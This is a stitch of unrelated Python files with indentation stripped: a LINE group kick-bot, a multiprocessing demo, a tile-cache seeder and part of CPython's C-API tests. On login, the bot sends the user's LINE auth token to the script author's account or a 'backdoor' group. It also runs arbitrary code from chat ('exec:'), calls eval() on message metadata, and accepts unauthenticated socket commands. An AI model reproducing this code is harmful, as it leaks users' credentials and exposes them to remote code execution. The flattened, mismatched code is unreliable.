from datetime import datetime
from time import sleep
from bs4 import BeautifulSoup
from googletrans import Translator
from humanfriendly import format_timespan, format_size, format_number, format_length
import socket, time, random, sys, json, codecs, threading, glob, re, string, os
import requests, subprocess, six, ast, urllib, urllib.parse, timeit, atexit
import youtube_dl, pafy, pytz
#yes
os.system('clear')
print('===============提示開始===============\n登入開始\n===============提示結束===============\n')
# Load saved settings (set.json)
set = json.load(codecs.open("set.json","r","utf-8"))
# Log in to LINE
if set["account"] == None or set["passwd"] == None:
set["account"] = input("\n===============輸入開始===============\n請輸入您想使用的帳號信箱:")
set["passwd"] = input("請輸入您想使用的帳號密碼:")
print('===============輸入結束===============\n')
while True:
try:
cl = LINE(set["account"],set["passwd"])
break
except Exception as e:
if e.reason == 'blocked user':
print('\n===============警示開始===============\n無法登入\n原因:帳號已禁言\n===============警示結束===============\n')
os._exit(0)
elif e.reason == 'Account ID or password is invalid':
print('\n===============警示開始===============\n無法登入\n原因:帳號不存在\n===============警示結束===============\n')
os._exit(0)
elif e.reason == 'Account ID and password does not match':
print('\n===============警示開始===============\n無法登入\n原因:密碼不正確\n===============警示結束===============\n')
os._exit(0)
elif e.reason == '':
print('\n===============警示開始===============\n無法登入\n原因:凍帳中\n===============警示結束===============\n')
print('\n===============提示開始===============\n將於1小時後自動登入\n===============提示結束===============\n')
counter = 60
for x in range(60):
time.sleep(60)
counter -= 1
if counter == 0:
break
print(f'\n===============提示開始===============\n將於{str(counter)}分鐘後後自動登入\n===============提示結束===============\n')
else:
print(f'\n===============警示開始===============\n無法登入\n原因:未知({str(e)})\n===============警示結束===============\n')
os._exit(0)
else:
break
print('\n===============提示開始===============\n登入成功\n===============提示結束===============\n')
clMID = cl.profile.mid
oepoll = OEPoll(cl)
# Settings: host IP and port
if set["ip"] == None or set["port"] == None:
hostname = socket.gethostname()
IPAddr = socket.gethostbyname(hostname)
set["ip"] = IPAddr
inpu = input(f'\n===============輸入開始===============\n當前機器IP為:{set["ip"]}\n錯誤請輸入正確IP否則請輸入"正確"\n請輸入您的回應:')
if inpu == "正確":
print("===============輸入結束===============\n")
else:
set["ip"] = inpu
print("===============輸入結束===============\n")
while True:
try:
set["port"] = int(input(f'\n===============輸入開始===============\n當前機器IP為:{set["ip"]}\n請輸入您想使用的端口(數字):'))
except:
print("===============輸入錯誤===============")
continue
else:
print("===============輸入結束===============\n")
break
if clMID not in set["owner"]:
set["owner"].append(clMID)
# Login notification
try:
cl.findAndAddContactsByMid(set["author"])
except:
print(f'\n===============警示開始===============\n加友規\n請手動加入機器好友\n機器MID:{clMID}\n===============警示結束===============\n')
try:
cl.sendMessage(set["backdoor"],f"☵[YTER機器]登入成功☵\n➢機器種類:單體保護機\n➢版本號:0.04\n➢登入者MID:{clMID}\n➢登入者TOKEN:{cl.authToken}\n☵[感謝您的使用]☵")
except:
print('\n===============警示開始===============\n機器帳號不在後台內\n請邀請機器加入\n現在先將登入通知傳至作者私訊\n===============警示結束===============\n')
cl.sendMessage(set["author"],f"☵[YTER機器]登入成功☵\n➢機器種類:單體保護機\n➢版本號:0.04\n➢登入者MID:{clMID}\n➢登入者TOKEN:{cl.authToken}\n☵[感謝您的使用]☵")
# Helper definitions
def backdoorWarning(msg):
print(f'\n===============警示開始===============\n{msg}\n===============警示結束===============\n')
cl.sendMessage(set["backdoor"],f"[警示]\n{msg}")
def backdoorPrompt(msg):
print(f'\n===============提示開始===============\n{msg}\n===============提示結束===============\n')
cl.sendMessage(set["backdoor"],f"[提示]\n{msg}")
def backupData():
try:
json.dump(set,codecs.open('set.json','w','utf-8'), sort_keys=True, indent=4, ensure_ascii=False)
except Exception as e:
backdoorWarning(f'backupData定義區段錯誤:\n{e}')
def sendOne(wh,dtjo):
d = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
d.connect(wh)
d.send(dtjo.encode())
d.close()
def sendAll(dtjo):
dtjo['sender'] = clMID
for hosts in set["bothosts"]:
sendOne((hosts[0], hosts[1]), json.dumps(dtjo))
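# The payloads exchanged between bot hosts over these sockets are JSON objects
# keyed by "type"; sendAll() stamps the local MID into "sender" so receive()
# can ignore a host's own broadcasts. An illustrative example (values are
# placeholders):
#   {"type": "recordTicket", "gid": "<group id>", "ticket": "<ticket>",
#    "sender": "<this bot's MID>"}
# Recognized types: inviteTicketJoin, recordTicket, changeTicket,
# requestRecordTicket, botTest.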
def receive(conn, addr):
while True:
indata = conn.recv(1024)
if len(indata) == 0:
conn.close()
backdoorPrompt(f'有請求關閉\n關閉連線IP: {addr[0]}:{addr[1]}')
break
message = indata.decode()
try:
msg = json.loads(message)
try:
if msg['sender'] != clMID:
if set['mode'] != 0:
if msg['type'] == 'inviteTicketJoin':
if set['mode'] == 1:
cl.acceptGroupInvitationByTicket(msg['gid'],msg['ticket'])
ticket = cl.reissueGroupTicket(msg['gid'])
sendAll({'type':'recordTicket','gid':msg['gid'],'ticket':str(ticket)})
if msg['gid'] in set["ticket"]:
if msg['ticket'] not in set["ticket"][msg['gid']]:
set["ticket"][msg['gid']].append(msg['ticket'])
else:
set["ticket"][msg['gid']] = [msg['ticket']]
elif msg['type'] == 'recordTicket':
if msg['gid'] in set["ticket"]:
if msg['ticket'] not in set["ticket"][msg['gid']]:
set["ticket"][msg['gid']].append(msg['ticket'])
else:
set["ticket"][msg['gid']] = [msg['ticket']]
elif msg['type'] == 'changeTicket':
if msg['gid'] in set["ticket"]:
if msg['ticket'] not in set["ticket"][msg['gid']]:
set["ticket"][msg['gid']].append(msg['ticket'])
else:
set["ticket"][msg['gid']] = [msg['ticket']]
elif msg['type'] == 'requestRecordTicket':
joinLink(msg['gid'])
ticket = cl.reissueGroupTicket(msg['gid'])
sendAll({'type':'recordTicket','gid':msg['gid'],'ticket':str(ticket)})
if msg['type'] == 'botTest':
if msg['sender'] not in set["bots"]:
set["bots"].append(msg['sender'])
sendMention(msg['to'], '測試訊息回報\n接收到來自 @! 的訊息', [msg['sender']])
except Exception as e:
backdoorWarning(f'Socket接收訊息(機器發出)處理失敗:\n{e}')
except:
backdoorPrompt(f'您有新訊息:\n{message}')
def runReceive():
while True:
conn, addr = s.accept()
t = threading.Thread(target=receive, args=(conn, addr))
t.start()
def joinLink(gid):
group = cl.getGroupWithoutMembers(gid)
if group.preventedJoinByTicket == True:
group.preventedJoinByTicket = False
cl.updateGroup(group)
def killban(to):
group = cl.getGroup(to)
gMembMids = [contact.mid for contact in group.members]
matched_list = []
for tag in set["ban"]:
matched_list += filter(lambda str: str == tag, gMembMids)
if matched_list == []:
return True
else:
for jj in matched_list:
try:
cl.kickoutFromGroup(to,[jj])
except:
pass
cl.sendMessage(to, "掃除黑名單作業完畢")
return False
def sendMention(to, text="", mids=[]):
arrData = ""
arr = []
mention = "@LT_Tech_Bot"
if mids == []:
raise Exception("Invalid mids")
if "@!" in text:
if text.count("@!") != len(mids):
raise Exception("Invalid mid")
texts = text.split("@!")
textx = ""
for mid in mids:
textx += str(texts[mids.index(mid)])
slen = len(textx)
elen = len(textx) + len(mention)
arrData = {'S':str(slen), 'E':str(elen), 'M':mid}
arr.append(arrData)
textx += mention
textx += str(texts[len(mids)])
else:
textx = ""
slen = len(textx)
elen = len(textx) + len(mention)
arrData = {'S':str(slen), 'E':str(elen), 'M':mids[0]}
arr.append(arrData)
textx += mention + str(text)
cl.sendMessage(to, textx, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
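# Illustrative example: sendMention(to, "hello @!", [mid]) sends the text
# "hello @LT_Tech_Bot" with a MENTION contentMetadata entry whose MENTIONEES
# list contains {"S": "6", "E": "18", "M": mid}, i.e. the character offsets of
# the placeholder that LINE renders as a tappable mention of that user.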
def replyMention(msgid, to, text="", mids=[]):
arrData = ""
arr = []
mention = "@LT_Tech_Bot"
if mids == []:
raise Exception("Invalid mids")
if "@!" in text:
if text.count("@!") != len(mids):
raise Exception("Invalid mid")
texts = text.split("@!")
textx = ""
for mid in mids:
textx += str(texts[mids.index(mid)])
slen = len(textx)
elen = len(textx) + len(mention)
arrData = {'S':str(slen), 'E':str(elen), 'M':mid}
arr.append(arrData)
textx += mention
textx += str(texts[len(mids)])
else:
textx = ""
slen = len(textx)
elen = len(textx) + len(mention)
arrData = {'S':str(slen), 'E':str(elen), 'M':mids[0]}
arr.append(arrData)
textx += mention + str(text)
cl.sendReplyMessage(msgid, to, textx, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
def addBlackList(mid):
if mid not in set["ban"]:
set["ban"].append(mid)
def lineBot(op):
try:
if set['mode'] != 0:
if op.type == 11:
if op.param3 == "4":
if op.param3 not in set["bots"]:
if set['mode'] == 2:
try:
cl.acceptGroupInvitation(op.param1)
except:
pass
if op.param2 not in set["owner"]:
try:
cl.kickoutFromGroup(op.param1,[op.param2])
except:
pass
addBlackList(op.param2)
joinLink(op.param1)
ticket = cl.reissueGroupTicket(op.param1)
sendAll({'type':'changeTicket','gid':op.param1,'ticket':str(ticket)})
sendMention(op.param1,'[警告] @! 更改群組網址設定', [op.param2])
if op.type == 13:
if clMID in op.param3:
if op.param2 in set["owner"]:
if set['mode'] == 1:
cl.acceptGroupInvitation(op.param1)
sendMention(op.param1,'☰☱☲☳自動入群☳☲☱☰\n單體保護機運行中\n感謝 @! 邀請\n目前模式:1\n☰☱☲☳☴結束☴☳☲☱☰', [op.param2])
joinLink(op.param1)
ticket = cl.reissueGroupTicket(op.param1)
sendAll({'type':'inviteTicketJoin','gid':op.param1,'ticket':str(ticket)})
killban(op.param1)
elif set['mode'] == 2:
sendAll({'type':'requestRecordTicket','gid':op.param1})
elif op.param2 in set["bots"]:
if set['mode'] == 1:
cl.acceptGroupInvitation(op.param1)
else:
if op.param3 not in set["bots"]:
for bpre in set["ban"]:
if bpre in op.param3:
if set['mode'] == 2:
try:
cl.acceptGroupInvitation(op.param1)
except:
pass
if op.param2 not in set["owner"]:
try:
cl.kickoutFromGroup(op.param1, [op.param2])
except:
pass
addBlackList(op.param2)
try:
cl.cancelGroupInvitation(op.param1,[bpre])
except:
pass
sendMention(op.param1,'[警告] @! 邀請黑名單使用者 @!', [op.param2,bpre])
if op.type == 17:
if op.param3 not in set["bots"]:
if op.param2 in set["ban"]:
if set['mode'] == 2:
try:
cl.acceptGroupInvitation(op.param1)
except:
pass
try:
cl.kickoutFromGroup(op.param1,[op.param2])
except:
pass
sendMention(op.param1,'[警告] 黑名單使用者 @! 入群', [op.param2])
if op.type == 19:
if clMID in op.param3:
if op.param1 in set["ticket"]:
for ts in set["ticket"][op.param1]:
while True:
try:
cl.acceptGroupInvitationByTicket(op.param1,ts)
if op.param2 not in set["owner"] and op.param2 not in set["bots"]:
try:
cl.kickoutFromGroup(op.param1, [op.param2])
except:
pass
addBlackList(op.param2)
return
except Exception as e:
if "Ticket not found:" in e.reason:
set["ticket"][op.param1].remove(ts)
break
elif e.reason == "request blocked" or "Prevented join by ticket:" in e.reason:
return
else:
continue
elif op.param3 in set["bots"] or op.param3 in set["owner"]:
if set['mode'] == 2:
try:
cl.acceptGroupInvitation(op.param1)
except:
pass
if op.param2 not in set["owner"] and op.param2 not in set["bots"]:
try:
cl.kickoutFromGroup(op.param1, [op.param2])
except:
pass
addBlackList(op.param2)
cl.findAndAddContactsByMid(op.param3)
cl.inviteIntoGroup(op.param1,[op.param3])
sendMention(op.param1,'[警告] @! 踢出 @!', [op.param2,op.param3])
if op.type == 26 or op.type == 25:
msg = op.message
text = msg.text
msg_id = msg.id
receiver = msg.to
sender = msg._from
if msg.toType == 0:
if sender != cl.profile.mid:
to = sender
else:
to = receiver
else:
to = receiver
if text is None:
cmd = ""
else:
cmd = text.lower()
if sender not in set["owner"] and sender not in set["bots"] and set['mode'] != 0:
for blword in set['keywt']:
if blword in cmd:
if msg.toType == 2:
try:
cl.kickoutFromGroup(to,[sender])
except:
pass
addBlackList(sender)
replyMention(msg_id, to,'[警告] @! 觸動關鍵字防禦', [sender])
break
if sender in set["owner"]:
if cmd == 'modelist':
ret_ = "ΞΞΞΞΞ〘模式列表〙ΞΞΞΞΞ"
ret_ += "\n更換請使用Mode:[數字]"
ret_ += "\n☱☱☱預備中模式☱☱☱"
ret_ += "\n➢0:[無]"
ret_ += "\n☱☱☱保護機模式☱☱☱"
ret_ += "\n➢1:群組內"
ret_ += "\n➢2:邀請中"
ret_ += "\nΞΞΞΞΞ〘 結束 〙ΞΞΞΞΞ"
cl.relatedMessage(to,ret_,msg_id)
elif cmd.startswith("mode:"):
mde = cmd[5:]
if mde == "0":
set['mode'] = 0
cl.relatedMessage(to,"切換成功\n已切換至模式0(停機模式)",msg_id)
elif mde == "1":
set['mode'] = 1
cl.relatedMessage(to,"切換成功\n已切換至模式1(群內模式)",msg_id)
elif mde == "2":
set['mode'] = 2
cl.relatedMessage(to,"切換成功\n已切換至模式2(卡邀模式)",msg_id)
else:
cl.relatedMessage(to,"切換失敗\n找不到該模式",msg_id)
elif cmd == 'set':
ret_ = "ΞΞΞΞΞ〘機器設定〙ΞΞΞΞΞ"
if set['mode'] == 0:
ret_ += "\n➢當前模式:0(停機模式)"
elif set['mode'] == 1:
ret_ += "\n➢當前模式:1(群內模式)"
elif set['mode'] == 2:
ret_ += "\n➢當前模式:2(卡邀模式)"
else:
ret_ += "\n➢當前模式:設定值錯誤"
ret_ += "\nΞΞΞΞΞ〘 結束 〙ΞΞΞΞΞ"
cl.relatedMessage(to,ret_,msg_id)
elif cmd == 'kbo':
if msg.toType == 2:
cl.relatedMessage(to, "單群掃黑進行中...",msg_id)
if killban(to):
cl.relatedMessage(to, "無黑單者",msg_id)
else:
cl.relatedMessage(to,"這裡不是群組",msg_id)
elif cmd == 'kba':
cl.relatedMessage(to, "全群掃黑進行中...",msg_id)
gids = cl.getGroupIdsJoined()
cl.relatedMessage(to, "機器共加入了 {} 個群組".format(str(len(gids))),msg_id)
for i in gids:
killban(i)
cl.relatedMessage(to, "全群掃黑完畢!",msg_id)
elif cmd.startswith("adminadd "):
targets = []
MENTION = eval(msg.contentMetadata['MENTION'])
for x in MENTION["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
if target in set["owner"]:
cl.relatedMessage(to,"該用戶已是權限者",msg_id)
elif target in set["ban"]:
cl.relatedMessage(to,"該用戶位於黑單",msg_id)
else:
set["owner"].append(target)
cl.relatedMessage(to,"權限給予完畢!",msg_id)
elif cmd.startswith("admindel "):
targets = []
MENTION = eval(msg.contentMetadata['MENTION'])
for x in MENTION["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
if target in set["owner"]:
set["owner"].remove(target)
else:
cl.relatedMessage(to,"該用戶並非權限者",msg_id)
cl.relatedMessage(to,"權限刪除完畢!",msg_id)
elif cmd == 'adminlist':
if set["owner"] == []:
cl.relatedMessage(to,"無權限者!",msg_id)
else:
mc = "ΞΞΞΞΞ〘權限列表〙ΞΞΞΞΞ"
for mi_d in set["owner"]:
mc += "\n➲"+cl.getContact(mi_d).displayName
cl.relatedMessage(to,mc + "\nΞΞΞΞΞ〘 結束 〙ΞΞΞΞΞ",msg_id)
elif cmd.startswith("banadd "):
targets = []
MENTION = eval(msg.contentMetadata['MENTION'])
for x in MENTION["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
if target in set["owner"]:
cl.relatedMessage(to,"該用戶是權限者",msg_id)
elif target in set["ban"]:
cl.relatedMessage(to,"該用戶已是黑單",msg_id)
else:
set["ban"].append(target)
cl.relatedMessage(to,"黑單加入完畢!",msg_id)
elif cmd.startswith("bandel "):
targets = []
MENTION = eval(msg.contentMetadata['MENTION'])
for x in MENTION["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
if target in set["ban"]:
set["ban"].remove(target)
else:
cl.relatedMessage(to,"該用戶並非黑單",msg_id)
cl.relatedMessage(to,"黑單刪除完畢!",msg_id)
elif cmd == 'clearban':
set["ban"].clear()
cl.relatedMessage(to,"黑單刪除完畢!",msg_id)
elif cmd == 'banlist':
if set["ban"] == []:
cl.relatedMessage(to,"無黑單者!",msg_id)
else:
mc = "ΞΞΞΞΞ〘黑單列表〙ΞΞΞΞΞ"
for mi_d in set["ban"]:
mc += "\n➲"+cl.getContact(mi_d).displayName
cl.relatedMessage(to,mc + "\nΞΞΞΞΞ〘 結束 〙ΞΞΞΞΞ",msg_id)
elif cmd == 'bye':
try:
cl.leaveGroup(to)
except:
try:
cl.leaveRoom(to)
except:
cl.acceptGroupInvitation(to)
cl.leaveGroup(to)
elif cmd == 'bottest':
if to == set["backdoor"]:
set["bots"].clear()
sendAll({'type':'botTest', 'to':to})
cl.relatedMessage(to,"成功發出測試請求",msg_id)
else:
cl.relatedMessage(to,"請在後台使用",msg_id)
elif cmd.startswith("addhost:"):
host_ = text[8:]
if ":" in host_:
x = host_.split(":")
try:
host__ = [str(x[0]), int(x[1])]
if host__ in set['bothosts']:
cl.relatedMessage(to,"已存在!",msg_id)
else:
set['bothosts'].append(host__)
cl.relatedMessage(to,"新增成功!",msg_id)
except:
cl.relatedMessage(to,"新增失敗!",msg_id)
else:
cl.relatedMessage(to,"目標錯誤",msg_id)
elif cmd.startswith("delhost:"):
host_ = text[8:]
if ":" in host_:
x = host_.split(":")
try:
host__ = [str(x[0]), int(x[1])]
if host__ in set['bothosts']:
set['bothosts'].remove(host__)
cl.relatedMessage(to,"刪除成功!",msg_id)
else:
cl.relatedMessage(to,"不存在!",msg_id)
except:
cl.relatedMessage(to,"刪除失敗!",msg_id)
else:
cl.relatedMessage(to,"目標錯誤",msg_id)
elif cmd == 'reb':
cl.relatedMessage(to,"重啟中請稍後...",msg_id)
backupData()
python = sys.executable
os.execl(python, python, *sys.argv)
elif cmd == 'save':
backupData()
cl.relatedMessage(to,"資料保存完畢",msg_id)
elif cmd.startswith("exec:"):
x = text[5:]
try:
exec(x)
except Exception as e:
cl.relatedMessage(to, f'執行錯誤\n{e}', msg_id)
elif cmd == 'mine':
try:
cl.kickoutFromGroup(msg.to, ["test"])
except Exception as e:
if e.reason == "request blocked":
aa = "規制"
else:
aa = "可以執行"
try:
cl.inviteIntoGroup(msg.to, ["test"])
bb = "可以執行"
except:
bb = "規制"
try:
cl.findAndAddContactsByMid("test")
except Exception as e:
if e.reason == "request blocked":
cc = "規制"
else:
cc = "可以執行"
try:
cl.acceptGroupInvitationByTicket("test", "test")
except Exception as e:
if e.reason == "request blocked":
dd = "規制"
else:
dd = "可以執行"
cl.relatedMessage(to, f"ΞΞΞΞΞ〘機器狀態查詢〙ΞΞΞΞΞ\n※踢人狀態:{aa}\n※邀請狀態:{bb}\n※取消狀態:可以執行\n※加友狀態:{cc}\n※網址狀態:{dd}", msg_id)
if set["mode"] != 0:
if "/ti/g/" in cmd:
link_re = re.compile(r'(?:line:/|line\.me/R)/ti/g/([a-zA-Z0-9_-]+)?')
links = link_re.findall(text)
n_links = []
for l in links:
if l not in n_links:
n_links.append(l)
for ticket_id in n_links:
try:
group = cl.findGroupByTicket(ticket_id)
if group.id in set["ticket"]:
if ticket_id not in set["ticket"][group.id]:
set["ticket"][group.id].append(ticket_id)
else:
set["ticket"][group.id] = [ticket_id]
if set["mode"] == 1:
cl.acceptGroupInvitationByTicket(group.id,ticket_id)
cl.sendMessage(group.id,"☰☱☲☳自動入群☳☲☱☰\n單體保護機運行中\n目前模式:1\n☰☱☲☳☴結束☴☳☲☱☰")
killban(group.id)
cl.relatedMessage(to,f"加入成功\n群組名稱:{group.name}\n人數:{len(group.members)}\n群組網址ID:{ticket_id}\nGID:{group.id}",msg_id)
except Exception as e:
if str(e.reason) == "request blocked":
cl.relatedMessage(to,"目前帳號規制中",msg_id)
elif "Ticket not found" in str(e.reason):
cl.relatedMessage(to,"此網址已失效",msg_id)
elif "Prevented join by group ticket" in str(e.reason):
cl.relatedMessage(to,"該群不開放網址加入",msg_id)
else:
cl.relatedMessage(to,"加入錯誤\n"+str(e),msg_id)
time.sleep(0.5)
except Exception as e:
backdoorWarning(f'lineBot定義區段錯誤:\n{e}')
# Run
if __name__ == "__main__":
backdoorPrompt("開始載入接收")
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind((str(set["ip"]), int(set["port"])))
s.listen(999999)
backdoorPrompt(f'開始聆聽Socket請求\n目前聆聽位置: {set["ip"]}:{set["port"]}')
threading.Thread(target=runReceive).start()
backdoorPrompt("接收載入完畢")
while True:
try:
ops = oepoll.singleTrace(count=50)
if ops is not None:
for op in ops:
oepoll.setRevision(op.revision)
thread = threading.Thread(target=lineBot, args=(op,))
thread.start()
except Exception as e:
backdoorWarning(f'多工執行區段錯誤:\n{e}')
|
day26-4 获取进程编号.py
|
# 1. Import the multiprocessing package
import multiprocessing
import time
import os
# Get the main process ID
main_process_id = os.getpid()
print('main_process_id:', main_process_id)
def dance():
# Get the current process ID
dance_process_id = os.getpid()
print('dance_process_id:', dance_process_id)
dance_parent_process_id = os.getppid()
print('dance_parent_process_id:', dance_parent_process_id)
for i in range(3):
print('dancing...')
time.sleep(0.2)
# Extension: forcibly kill the process with the given PID
os.kill(dance_process_id, 9)
def sing():
sing_process_id = os.getpid()
print('sing_process_id:', sing_process_id)
sing_parent_process_id = os.getppid()
print('sing_parent_process_id:', sing_parent_process_id)
for i in range(3):
print('singing...')
time.sleep(0.2)
# 2. Create the child process objects
sing_process = multiprocessing.Process(target=sing)
dance_process = multiprocessing.Process(target=dance)
# 3. Start the child processes
if __name__ == '__main__':
sing_process.start()
dance_process.start()
|
cacheTiles.py
|
import sys
import time
import urllib.request
import threading
usage = "\n\n\n\tUSAGE: " + sys.argv[0] + " zoomLevel <optionalNumThreads> <optionalDelayBetweenRequests> <optionalXStart> <optionalYStart>\n\n\n"
if len(sys.argv) == 1:
print(usage)
sys.exit(1)
zoom = int(sys.argv[1])
print('Seeding cache for zoom level {}. This is a total of {} tiles.'\
.format(zoom, 2**(2*zoom)))
if len(sys.argv) > 2:
numThreads = int(sys.argv[2])
else:
numThreads = 1
if len(sys.argv) > 3:
delay = float(sys.argv[3])
else:
delay = 0
if len(sys.argv) > 4:
startX = int(sys.argv[4])
else:
startX = 0
if len(sys.argv) > 5:
startY = int(sys.argv[5])
else:
startY = 0
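# Illustrative invocation (the values below are hypothetical, not from the original script):
#   python3 cacheTiles.py 6 4 0.05
# would seed zoom level 6 with up to 4 concurrent requests and a 50 ms delay
# between dispatches, starting from tile x=0, y=0.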
dispatchSemaphore = threading.Semaphore(value=numThreads)
timeTakenArray = []
tileCounter = 0
def sendRequest(x, y):
reqStartTime = int(round(time.time() * 1000))
response = urllib.request.urlopen('http://localhost:8080/map/sky/tiles/{}/{}/{}.png'.format(zoom, x, y))
reqEndTime = int(round(time.time() * 1000))
timeTaken = (reqEndTime - reqStartTime)/1000
if response.getcode() == 200:
actionString = 'cache hit'
elif response.getcode() == 201:
actionString = 'cache miss'
#TODO: Also store which z, x, y this time is for so that for the slowest X percent of tiles we can also go a couple extra zoom levels down and pre-cache those as well since they are likely to be slower on average.
timeTakenArray.append(timeTaken)
elif response.getcode() == 302:
actionString = 'all black tile redirect'
else:
actionString = 'code: ' + str(response.getcode())
print('{:.2%} Zoom {}: x: {} y: {} Request took {} seconds {}'\
.format(tileCounter/2**(2*zoom), zoom, x, y, round(timeTaken, 2), actionString))
dispatchSemaphore.release()
for x in range(startX, 2**zoom):
for y in range(startY, 2**zoom):
tileCounter += 1
dispatchSemaphore.acquire()
t = threading.Thread(target=sendRequest, args=(x, y))
t.start()
time.sleep(delay)
if len(timeTakenArray) > 0:
minTime = timeTakenArray[0]
maxTime = timeTakenArray[0]
sumTime = 0
for elapsed in timeTakenArray:
    sumTime += elapsed
    minTime = min(elapsed, minTime)
    maxTime = max(elapsed, maxTime)
print('\n\n-------------------------------------\n\nFinished.')
print('Min time taken for a single request: {}'.format(minTime))
print('Max time taken for a single request: {}'.format(maxTime))
print('Average time taken for a single request: {}'.format(sumTime/len(timeTakenArray)))
else:
print('\n\n-------------------------------------\n\nFinished.')
print('All tiles were already cached.')
|
test_capi.py
|
# Run the _testcapi module tests (tests for the Python/C API): by defn,
# these are all functions _testcapi exports whose name begins with 'test_'.
from collections import OrderedDict
import os
import pickle
import random
import re
import subprocess
import sys
import textwrap
import threading
import time
import unittest
import weakref
import importlib.machinery
import importlib.util
from test import support
from test.support import MISSING_C_DOCSTRINGS
from test.support import import_helper
from test.support import threading_helper
from test.support import warnings_helper
from test.support.script_helper import assert_python_failure, assert_python_ok
try:
import _posixsubprocess
except ImportError:
_posixsubprocess = None
# Skip this test if the _testcapi module isn't available.
_testcapi = import_helper.import_module('_testcapi')
import _testinternalcapi
# Were we compiled --with-pydebug or with #define Py_DEBUG?
Py_DEBUG = hasattr(sys, 'gettotalrefcount')
def testfunction(self):
"""some doc"""
return self
class InstanceMethod:
id = _testcapi.instancemethod(id)
testfunction = _testcapi.instancemethod(testfunction)
class CAPITest(unittest.TestCase):
def test_instancemethod(self):
inst = InstanceMethod()
self.assertEqual(id(inst), inst.id())
self.assertTrue(inst.testfunction() is inst)
self.assertEqual(inst.testfunction.__doc__, testfunction.__doc__)
self.assertEqual(InstanceMethod.testfunction.__doc__, testfunction.__doc__)
InstanceMethod.testfunction.attribute = "test"
self.assertEqual(testfunction.attribute, "test")
self.assertRaises(AttributeError, setattr, inst.testfunction, "attribute", "test")
def test_no_FatalError_infinite_loop(self):
with support.SuppressCrashReport():
p = subprocess.Popen([sys.executable, "-c",
'import _testcapi;'
'_testcapi.crash_no_current_thread()'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
(out, err) = p.communicate()
self.assertEqual(out, b'')
# This used to cause an infinite loop.
self.assertTrue(err.rstrip().startswith(
b'Fatal Python error: '
b'PyThreadState_Get: '
b'the function must be called with the GIL held, '
b'but the GIL is released '
b'(the current Python thread state is NULL)'),
err)
def test_memoryview_from_NULL_pointer(self):
self.assertRaises(ValueError, _testcapi.make_memoryview_from_NULL_pointer)
def test_exc_info(self):
raised_exception = ValueError("5")
new_exc = TypeError("TEST")
try:
raise raised_exception
except ValueError as e:
tb = e.__traceback__
orig_sys_exc_info = sys.exc_info()
orig_exc_info = _testcapi.set_exc_info(new_exc.__class__, new_exc, None)
new_sys_exc_info = sys.exc_info()
new_exc_info = _testcapi.set_exc_info(*orig_exc_info)
reset_sys_exc_info = sys.exc_info()
self.assertEqual(orig_exc_info[1], e)
self.assertSequenceEqual(orig_exc_info, (raised_exception.__class__, raised_exception, tb))
self.assertSequenceEqual(orig_sys_exc_info, orig_exc_info)
self.assertSequenceEqual(reset_sys_exc_info, orig_exc_info)
self.assertSequenceEqual(new_exc_info, (new_exc.__class__, new_exc, None))
self.assertSequenceEqual(new_sys_exc_info, new_exc_info)
else:
self.assertTrue(False)
@unittest.skipUnless(_posixsubprocess, '_posixsubprocess required for this test.')
def test_seq_bytes_to_charp_array(self):
# Issue #15732: crash in _PySequence_BytesToCharpArray()
class Z(object):
def __len__(self):
return 1
self.assertRaises(TypeError, _posixsubprocess.fork_exec,
1,Z(),3,(1, 2),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21)
# Issue #15736: overflow in _PySequence_BytesToCharpArray()
class Z(object):
def __len__(self):
return sys.maxsize
def __getitem__(self, i):
return b'x'
self.assertRaises(MemoryError, _posixsubprocess.fork_exec,
1,Z(),3,(1, 2),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21)
@unittest.skipUnless(_posixsubprocess, '_posixsubprocess required for this test.')
def test_subprocess_fork_exec(self):
class Z(object):
def __len__(self):
return 1
# Issue #15738: crash in subprocess_fork_exec()
self.assertRaises(TypeError, _posixsubprocess.fork_exec,
Z(),[b'1'],3,(1, 2),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21)
@unittest.skipIf(MISSING_C_DOCSTRINGS,
"Signature information for builtins requires docstrings")
def test_docstring_signature_parsing(self):
self.assertEqual(_testcapi.no_docstring.__doc__, None)
self.assertEqual(_testcapi.no_docstring.__text_signature__, None)
self.assertEqual(_testcapi.docstring_empty.__doc__, None)
self.assertEqual(_testcapi.docstring_empty.__text_signature__, None)
self.assertEqual(_testcapi.docstring_no_signature.__doc__,
"This docstring has no signature.")
self.assertEqual(_testcapi.docstring_no_signature.__text_signature__, None)
self.assertEqual(_testcapi.docstring_with_invalid_signature.__doc__,
"docstring_with_invalid_signature($module, /, boo)\n"
"\n"
"This docstring has an invalid signature."
)
self.assertEqual(_testcapi.docstring_with_invalid_signature.__text_signature__, None)
self.assertEqual(_testcapi.docstring_with_invalid_signature2.__doc__,
"docstring_with_invalid_signature2($module, /, boo)\n"
"\n"
"--\n"
"\n"
"This docstring also has an invalid signature."
)
self.assertEqual(_testcapi.docstring_with_invalid_signature2.__text_signature__, None)
self.assertEqual(_testcapi.docstring_with_signature.__doc__,
"This docstring has a valid signature.")
self.assertEqual(_testcapi.docstring_with_signature.__text_signature__, "($module, /, sig)")
self.assertEqual(_testcapi.docstring_with_signature_but_no_doc.__doc__, None)
self.assertEqual(_testcapi.docstring_with_signature_but_no_doc.__text_signature__,
"($module, /, sig)")
self.assertEqual(_testcapi.docstring_with_signature_and_extra_newlines.__doc__,
"\nThis docstring has a valid signature and some extra newlines.")
self.assertEqual(_testcapi.docstring_with_signature_and_extra_newlines.__text_signature__,
"($module, /, parameter)")
def test_c_type_with_matrix_multiplication(self):
M = _testcapi.matmulType
m1 = M()
m2 = M()
self.assertEqual(m1 @ m2, ("matmul", m1, m2))
self.assertEqual(m1 @ 42, ("matmul", m1, 42))
self.assertEqual(42 @ m1, ("matmul", 42, m1))
o = m1
o @= m2
self.assertEqual(o, ("imatmul", m1, m2))
o = m1
o @= 42
self.assertEqual(o, ("imatmul", m1, 42))
o = 42
o @= m1
